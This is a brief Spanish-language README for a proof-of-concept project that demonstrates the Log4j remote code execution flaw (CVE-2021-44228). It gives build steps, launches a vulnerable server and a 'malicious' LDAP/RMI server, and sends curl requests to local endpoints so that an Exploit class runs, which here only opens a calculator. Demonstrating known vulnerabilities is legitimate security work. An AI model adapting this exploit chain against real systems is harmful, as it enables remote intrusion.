
proyecto de demostración para resaltar cómo ejecutar la vulnerabilidad log4j (CVE-2021-44228)
proyectos de demostración para resaltar cómo ejecutar la vulnerabilidad log4j (CVE-2021-44228)
Se usó Spring Boot solo para configurarlo rápidamente. Tendrás que disculpar todo el código hardcodeado, era solo un POC.
Ten Java 8 instalado. Compila con Maven mvn clean package -DskipTests. Ejecuta estos comandos en ventanas de shell separadas:
java -jar vulnerable-server/target/vulnerable-server.jar
java -jar malicious-server/target/malicious-server.jar
curl http://localhost:8880/victimLDAP
curl http://localhost:8880/victimRMI
Esto debería ejecutar el código de la clase Exploit (que solo abrirá la calculadora)